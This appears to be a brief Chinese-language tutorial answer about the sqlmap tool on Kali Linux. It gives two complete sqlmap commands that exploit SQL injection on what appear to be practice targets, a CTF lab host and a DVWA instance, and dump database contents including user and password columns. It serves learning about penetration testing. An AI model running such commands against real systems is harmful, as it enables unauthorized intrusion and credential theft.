kali sqmap
时间: 2023-11-03 14:03:25 浏览: 46
kali是一种基于Debian的Linux发行版,主要用于渗透测试和网络安全评估。sqlmap是kali中的一个工具,它用于检测和利用SQL注入漏洞。它可以自动探测和利用不同类型的SQL注入漏洞,并且提供了多种注入方式和选项来获取数据库中的敏感数据。使用sqlmap,你可以通过抓取页面数据或提供其他必要参数来执行注入攻击,从而获取目标数据库中的信息。
关于sqlmap的具体使用,你可以参考以下命令示例:
```
root@kali:~# sqlmap -u "http://eci-zf2.cloudecil1.ichunqiu.com" --data "uname=*&passwd=&submit=Submit" --level 3 --dump -D "sql10051008"
```
这个命令在指定的URL上执行SQL注入测试,并使用level参数设置注入测试的深度为3,使用--dump参数导出注入点的数据库信息,-D参数指定数据库名称为sql10051008。
另外一个命令示例是:
```
sqlmap -u "http://33.333.33.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=9tur5fv0k1m4sje2a4ugsu3u74" --dump -C user,password -T users -D dvwa
```
这个命令用于在指定的URL上执行SQL注入测试,并使用--cookie参数指定cookie信息,--dump参数导出注入点的数据库信息,-C参数指定要查询的列名,-T参数指定要查询的表名,-D参数指定要查询的数据库名称。